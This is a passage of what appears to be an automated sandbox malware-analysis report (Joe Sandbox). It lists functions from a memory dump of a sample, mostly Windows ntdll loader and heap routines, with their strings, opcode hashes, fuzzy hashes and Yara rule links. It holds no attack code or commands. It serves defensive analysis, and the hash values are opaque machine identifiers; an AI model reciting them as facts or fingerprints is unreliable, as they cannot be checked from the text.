                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                        • Opcode ID: cbc1aac90600b95bf54f8eecbe4d0142e8cffa01bac2e8a77b5821e0d9983fde
                                                                                                                                        • Instruction ID: 87e56a4dd47316224ea909c4402746e02e7979505a90fde8f6d4e09555f1d43a
                                                                                                                                        • Opcode Fuzzy Hash: cbc1aac90600b95bf54f8eecbe4d0142e8cffa01bac2e8a77b5821e0d9983fde
                                                                                                                                        • Instruction Fuzzy Hash: D17102B1904305AFCB61DF54C889B9B7FE8AF94B58F00046CF9889B646D335D189CBD2
                                                                                                                                        Function 0111245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0115A998
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0115A9A2
                                                                                                                                        • apphelp.dll, xrefs: 01112462
                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0115A992
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                        • Opcode ID: 2da0200acf3d56d924784fb5a58d78299a0cdb951eb2a1fc8be79e05d96851c3
                                                                                                                                        • Instruction ID: 6092b656864629ee8f0814663bc480389c04d001b063612519035eabf30f14b2
                                                                                                                                        • Opcode Fuzzy Hash: 2da0200acf3d56d924784fb5a58d78299a0cdb951eb2a1fc8be79e05d96851c3
                                                                                                                                        • Instruction Fuzzy Hash: E2312A75A80201EBDB3D9FD9E845EA9BBF4FF84714F160169E9316B245D77058C1CB80
                                                                                                                                        Function 011029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • HEAP: , xrefs: 01103264
                                                                                                                                        • HEAP[%wZ]: , xrefs: 01103255
                                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0110327D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                        • API String ID: 0-617086771
                                                                                                                                        • Opcode ID: 0830d36af0f02595e44387d3475880b3db52bd33f44a2b031fdbc719b1208829
                                                                                                                                        • Instruction ID: 059a8e8147b8f24ba7208f0383c896d084db6b40091dcc8112c6f784867c38ac
                                                                                                                                        • Opcode Fuzzy Hash: 0830d36af0f02595e44387d3475880b3db52bd33f44a2b031fdbc719b1208829
                                                                                                                                        • Instruction Fuzzy Hash: 4F92BC70E046499FDB2ACFA8C4447AEBBF1FF48304F188069E859AB391D7B5A945CF50
                                                                                                                                        Function 01100770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-4253913091
                                                                                                                                        • Opcode ID: 11fd993ce37613ab3efd8d7084964d5481d0041abfed1ec47880ee7a34c31e78
                                                                                                                                        • Instruction ID: 9c33d53b86eaabd7618c9fd981f8c09d67d847ea1c4cf1e1aceeda5650a31b2d
                                                                                                                                        • Opcode Fuzzy Hash: 11fd993ce37613ab3efd8d7084964d5481d0041abfed1ec47880ee7a34c31e78
                                                                                                                                        • Instruction Fuzzy Hash: F9F1BE30A00606DFEB5ECF68C894B6ABBF2FF49344F144169E8569B381D774E981CB91
                                                                                                                                        Function 01116962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $@
                                                                                                                                        • API String ID: 0-1077428164
                                                                                                                                        • Opcode ID: 566ae8987ffdbd579bc042aa0023f6df0c85443281f8411f581489fa7aa188a4
                                                                                                                                        • Instruction ID: 801813b560b737c9b9961fd9d6379c00dc43531c058a5096834eecb4af989d28
                                                                                                                                        • Opcode Fuzzy Hash: 566ae8987ffdbd579bc042aa0023f6df0c85443281f8411f581489fa7aa188a4
                                                                                                                                        • Instruction Fuzzy Hash: 14C29F716087419FE729CF28C840BABFBE5AF88714F05892DE99987385D774D805CB92
                                                                                                                                        Function 010EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                        • API String ID: 0-2779062949
                                                                                                                                        • Opcode ID: 29542f51c75e1c85c529560de0d74da747f8a6c23c247054aee0c011af8d63c5
                                                                                                                                        • Instruction ID: dac55c89a4818e1adf09ab1112024884b512e40fff275ecf72751d67332ca25c
                                                                                                                                        • Opcode Fuzzy Hash: 29542f51c75e1c85c529560de0d74da747f8a6c23c247054aee0c011af8d63c5
                                                                                                                                        • Instruction Fuzzy Hash: 1BA16D719116299BDB35DF68CC88BEEB7B8EF48B14F1001E9E908A7250D7359E85CF90
                                                                                                                                        Function 01110BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0115A10F
                                                                                                                                        • LdrpCheckModule, xrefs: 0115A117
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0115A121
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-161242083
                                                                                                                                        • Opcode ID: 8f0a7a4ac30a5ac33e5d2269c90ba0ee62808dac1d3b184c87e3fc1bdd4069c6
                                                                                                                                        • Instruction ID: 7f98cc8ad2aaec01386d235faaa0f5c667b1fc54866b5de885919d272a598dc5
                                                                                                                                        • Opcode Fuzzy Hash: 8f0a7a4ac30a5ac33e5d2269c90ba0ee62808dac1d3b184c87e3fc1bdd4069c6
                                                                                                                                        • Instruction Fuzzy Hash: 9871BC74E00206DFDB2DDFA8C980BAEB7F5EF88204F15417DE9229B255E735A981CB41
                                                                                                                                        Function 01100A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-1334570610
                                                                                                                                        • Opcode ID: fdee08517086ed565703cd827b6286a96b288ff2a2980d40db138f6701037c20
                                                                                                                                        • Instruction ID: 33acd05d8157b05580c28f21df749009e95113c74497082b6b78f4fd35933926
                                                                                                                                        • Opcode Fuzzy Hash: fdee08517086ed565703cd827b6286a96b288ff2a2980d40db138f6701037c20
                                                                                                                                        • Instruction Fuzzy Hash: 6E61B034A04701DFD76ECF28C444B6ABBE2FF49744F148569E8998F292D7B0E881CB91
                                                                                                                                        Function 0112C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 011682E8
                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 011682D7
                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 011682DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                        • Opcode ID: 41c91a23c94c9e790b80304b045017cf732cfe9f4b1fa1aee037218ce0960236
                                                                                                                                        • Instruction ID: 6f5e9ecc986c67bba0273885d8a6f3093b0bcf4a78580e81edcfa44e99d3b555
                                                                                                                                        • Opcode Fuzzy Hash: 41c91a23c94c9e790b80304b045017cf732cfe9f4b1fa1aee037218ce0960236
                                                                                                                                        • Instruction Fuzzy Hash: 844140B1510711ABC73DEBA8D844B5B77E8AF58714F00093AFA98CB290E770D840CBD1
                                                                                                                                        Function 011AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • PreferredUILanguages, xrefs: 011AC212
                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011AC1C5
                                                                                                                                        • @, xrefs: 011AC1F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                        • API String ID: 0-2968386058
                                                                                                                                        • Opcode ID: e4ea762e752b38187c5b7000d14eceb440e4f33e2eb60f7b226c4aa6dc4a66e5
                                                                                                                                        • Instruction ID: b2c9cfe4a76e1e844798036ce268c0ac2d02a478214eb63f1c583a6b5da795e6
                                                                                                                                        • Opcode Fuzzy Hash: e4ea762e752b38187c5b7000d14eceb440e4f33e2eb60f7b226c4aa6dc4a66e5
                                                                                                                                        • Instruction Fuzzy Hash: 5A418275E0020AEBDF19DBD8C841FEEBBB9AB54714F40406BE609F7280D7749A448B90
                                                                                                                                        Function 01184144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                        • API String ID: 0-1373925480
                                                                                                                                        • Opcode ID: ab55f248cd188367b974988f3dab4ebdc56fa84e129084da9b324181ca9dc09a
                                                                                                                                        • Instruction ID: 66557c8ecc180a2cf2bae72e2504fe57ead91aac27514e763545255fbd377e12
                                                                                                                                        • Opcode Fuzzy Hash: ab55f248cd188367b974988f3dab4ebdc56fa84e129084da9b324181ca9dc09a
                                                                                                                                        • Instruction Fuzzy Hash: 2D414431A0465A8FEB2EEBE8D840BADBBB5FF61344F14401AD901EBB81DB349901CF11
                                                                                                                                        Function 01174755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrpCheckRedirection, xrefs: 0117488F
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01174899
                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01174888
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                        • Opcode ID: d100b8bfa8bbedb2ed6c71fd8e6b769af3a3494534c5661b989fe5f024c05411
                                                                                                                                        • Instruction ID: cce7818065fadb78128e443e5eadd4718f16726454269d5d8f0b091556eb4d06
                                                                                                                                        • Opcode Fuzzy Hash: d100b8bfa8bbedb2ed6c71fd8e6b769af3a3494534c5661b989fe5f024c05411
                                                                                                                                        • Instruction Fuzzy Hash: 9841B272A04A55DFCB29CFACD840A26BBF4BF49A50F06056DED99DBB11D730D840CB91
                                                                                                                                        Function 01100BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-2558761708
                                                                                                                                        • Opcode ID: a15262c36ea7fd3eb02f7b3be23cfbc5ee7c7e894f366118c868484c5c26cb46
                                                                                                                                        • Instruction ID: c545330e761b442f262bf1d472d637c56fe403a89a68cf121754f5bb0da6a52f
                                                                                                                                        • Opcode Fuzzy Hash: a15262c36ea7fd3eb02f7b3be23cfbc5ee7c7e894f366118c868484c5c26cb46
                                                                                                                                        • Instruction Fuzzy Hash: 55112430314542CFDB9EDA19C444B7ABBE6EF44A19F19802EF816CF292EB70E840C752
                                                                                                                                        Function 011720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01172104
                                                                                                                                        • LdrpInitializationFailure, xrefs: 011720FA
                                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 011720F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2986994758
                                                                                                                                        • Opcode ID: 552c534cfb1e716f033e00ea5ffa66255b92a868def304fd853bc46d7485da37
                                                                                                                                        • Instruction ID: 432fc85974416a6c76fa69436aef94a662bd18f3a4e1a32856fd5848bccd1989
                                                                                                                                        • Opcode Fuzzy Hash: 552c534cfb1e716f033e00ea5ffa66255b92a868def304fd853bc46d7485da37
                                                                                                                                        • Instruction Fuzzy Hash: 9AF028346403086BE72CD68CDC03F9937B8FB40B48F10006CF6406B381D3B0A540CA41
                                                                                                                                        Function 011003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: #%u
                                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                                        • Opcode ID: ebeb8dff2f72cef0222ed251c02ef002080389233d60e20243c76413e674b394
                                                                                                                                        • Instruction ID: 13cdc9b8dad1b31003e0d206fa871efdeefd7f74ff50991837d805a7f979e0b9
                                                                                                                                        • Opcode Fuzzy Hash: ebeb8dff2f72cef0222ed251c02ef002080389233d60e20243c76413e674b394
                                                                                                                                        • Instruction Fuzzy Hash: 5D716A71A0014A9FDB0ADFA8C980BAEB7F8BF58744F154065E910E7291EB74EE41CB60
                                                                                                                                        Function 010FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrResSearchResource Exit, xrefs: 010FAA25
                                                                                                                                        • LdrResSearchResource Enter, xrefs: 010FAA13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                        • API String ID: 0-4066393604
                                                                                                                                        • Opcode ID: f0e4d117152e290b2d3e1c720bebf37c25df403e6814026afe467a9ed0c94afb
                                                                                                                                        • Instruction ID: 92bbb377de15387af3851d6d460d64b776eca0bdf607411eac00e2bf1ffb3cea
                                                                                                                                        • Opcode Fuzzy Hash: f0e4d117152e290b2d3e1c720bebf37c25df403e6814026afe467a9ed0c94afb
                                                                                                                                        • Instruction Fuzzy Hash: 5CE1CE71F00209EFEB6ACF99C981BAEBBB9BF04350F00442AEE65E7651D7749804CB51
                                                                                                                                        Function 011BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: `$`
                                                                                                                                        • API String ID: 0-197956300
                                                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                        • Instruction ID: 56c790e82f7e28146d1e2f965f2db85ac208178830501f2afc0d04a823f25f80
                                                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                        • Instruction Fuzzy Hash: 70C1C3712083469BE729CF29D881BABBBE5BFC4318F084A2DF696C7290D775D505CB41
                                                                                                                                        Function 0116E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                        • Opcode ID: de6f7ebcddf9a47f66266a2bb022b79eecebde482689d7636b6126735f89db66
                                                                                                                                        • Instruction ID: e2c7d0e477878783bfb05ec57ea151589c23322002f525ac141a207c061d0588
                                                                                                                                        • Opcode Fuzzy Hash: de6f7ebcddf9a47f66266a2bb022b79eecebde482689d7636b6126735f89db66
                                                                                                                                        • Instruction Fuzzy Hash: 91615C76E017199FDB19DFA8C840BAEBBB9FB44704F14412DE649EB291D732A910CB50
                                                                                                                                        Function 011943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$MUI
                                                                                                                                        • API String ID: 0-17815947
                                                                                                                                        • Opcode ID: 80da93a3a6c73db04986c27c2be5f588989501126b7c7897f3944d3319f29bdc
                                                                                                                                        • Instruction ID: 05619d011988a8b638d156968248e81f614a18d09c4086a03606733e95fe695a
                                                                                                                                        • Opcode Fuzzy Hash: 80da93a3a6c73db04986c27c2be5f588989501126b7c7897f3944d3319f29bdc
                                                                                                                                        • Instruction Fuzzy Hash: 72510971E0061DAFEF15DFE9CD90AEEBBB8EB44754F100529E611B7690D7309906CB60
                                                                                                                                        Function 010F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010F063D
                                                                                                                                        • kLsE, xrefs: 010F0540
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                        • Opcode ID: ede1972e2e799ea895de7ad9a6e6716ec8791633dd6a0891563b6ae7ca074285
                                                                                                                                        • Instruction ID: 3b03a7c9dad40d1064ef3b1d1d2fcfe074716e9c7341cda17b9b3fa6eab394f3
                                                                                                                                        • Opcode Fuzzy Hash: ede1972e2e799ea895de7ad9a6e6716ec8791633dd6a0891563b6ae7ca074285
                                                                                                                                        • Instruction Fuzzy Hash: 6C51FF71600702CBC724DF68C4456A7BBE6AF88704F10883EFAE987A46E770E545CB92
                                                                                                                                        Function 010FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 010FA2FB
                                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 010FA309
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                        • API String ID: 0-2876891731
                                                                                                                                        • Opcode ID: 0000cff173d25dad963afd84aaec31064135d27f4c1d31f1ded44e7783e49e6f
                                                                                                                                        • Instruction ID: b1dbf7f477ab712f7817f74f09284527553b3b3184ea44cc8b93d432b30d2d5b
                                                                                                                                        • Opcode Fuzzy Hash: 0000cff173d25dad963afd84aaec31064135d27f4c1d31f1ded44e7783e49e6f
                                                                                                                                        • Instruction Fuzzy Hash: F141CC35B00645DBDB2ACF59C841B6E7BB4FF84700F1480A9EAA8DB691E3B9D900CB40
                                                                                                                                        Function 0112A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                        • Opcode ID: b19595add9e1b16b4410276508f2699d295be3b324e7abcc2f5772a9f6aeb1b8
                                                                                                                                        • Instruction ID: a92f9907c2c738e21e1d22451d7f176aab9126fb7fc572289c769023d3b17c16
                                                                                                                                        • Opcode Fuzzy Hash: b19595add9e1b16b4410276508f2699d295be3b324e7abcc2f5772a9f6aeb1b8
                                                                                                                                        • Instruction Fuzzy Hash: DC012CB2210700AFD325DF64DD09F2A77E9EB98B29F008839E258CB580E334E814CB46
                                                                                                                                        Function 010FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: MUI
                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                        • Opcode ID: fb4f30a5570aae47b44b78ca7b7df7e4484808981bca4b78066dda2658842d4e
                                                                                                                                        • Instruction ID: f660642261be08754a23884b0f2800d5dbe214fdc96c747729db468363e27b20
                                                                                                                                        • Opcode Fuzzy Hash: fb4f30a5570aae47b44b78ca7b7df7e4484808981bca4b78066dda2658842d4e
                                                                                                                                        • Instruction Fuzzy Hash: CD827F75E0021D8BEB65CFA9C942BEDBBB1FF44310F1481ADDA99ABA50D730A941CB50
                                                                                                                                        Function 01176420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                        • Opcode ID: d2a9fec99ea1b6809745c58a1ab8fda7a31c428ef880574c80d1b6febf6ffe2e
                                                                                                                                        • Instruction ID: 1caf9ccc6a9519415b3fba60b399a224e9feaf0800271e82cedf207fc78807ee
                                                                                                                                        • Opcode Fuzzy Hash: d2a9fec99ea1b6809745c58a1ab8fda7a31c428ef880574c80d1b6febf6ffe2e
